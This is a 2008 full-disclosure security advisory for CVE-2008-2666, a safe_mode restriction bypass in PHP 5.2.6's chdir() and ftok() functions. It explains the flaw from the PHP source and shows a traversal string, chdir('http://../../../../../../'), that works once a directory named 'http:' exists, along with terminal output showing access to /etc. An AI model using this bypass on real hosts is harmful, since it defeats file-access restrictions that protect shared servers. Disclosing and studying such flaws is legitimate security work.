-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) securityreason.com Date: - - Written: 10.05.2008 - - Public: 17.06.2008 SecurityReason Research SecurityAlert Id: 55 CVE: CVE-2008-2666 CWE: CWE-264 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/55 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. chdir ? Change directory SYNOPSIS: bool chdir ( string $directory ) http://pl.php.net/manual/en/function.chdir.php ftok ? Convert a pathname and a project identifier to a System V IPC key SYNOPSIS: int ftok ( string $pathname , string $proj ) http://pl.php.net/manual/en/function.ftok.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass --- Let's see to chdir() function - --- PHP_FUNCTION(chdir) { char *str; int ret, str_len; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) { RETURN_FALSE; } if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) { RETURN_FALSE; } ret = VCWD_CHDIR(str); if (ret != 0) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno); RETURN_FALSE; } RETURN_TRUE; } - --- str is beeing checked by safe_mode example: - --- Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8 - --- in current directory, we should create subdir "http:". => it is possible to create chdir("http://../../../../../../") and we are in / Why? TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))) for str="http://../../../../../../" safe_mode will ignore all paths with http:// that same situation with ftok() function (and more) - ---EXAMPLE1--- cxib# cat /www/wufff.php cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php cxib# php /www/wufff.php /www Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3 /www cxib# - ---/EXAMPLE1--- - ---EXAMPLE2--- cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php cxib# ls -la /www/http: total 8 drwxr-xr-x 2 www www 512 Jun 17 17:12 . drwxr-xr-x 19 www www 4608 Jun 17 17:13 .. cxib# cat /www/wufff.php cxib# php /www/wufff.php /www /etc cxib# - ---/EXAMPLE2--- !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LISTS ALL VULNERABLE FUNCTIONS - --- 2. How to fix --- Do not use safe_mode as a main safety - --- 3. Greets --- sp3x Infospec schain p_e_a Chujwamwdupe - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.4 (FreeBSD) iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9 W6fcb5TR6GxN9osji+wQCqM= =tyyL -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/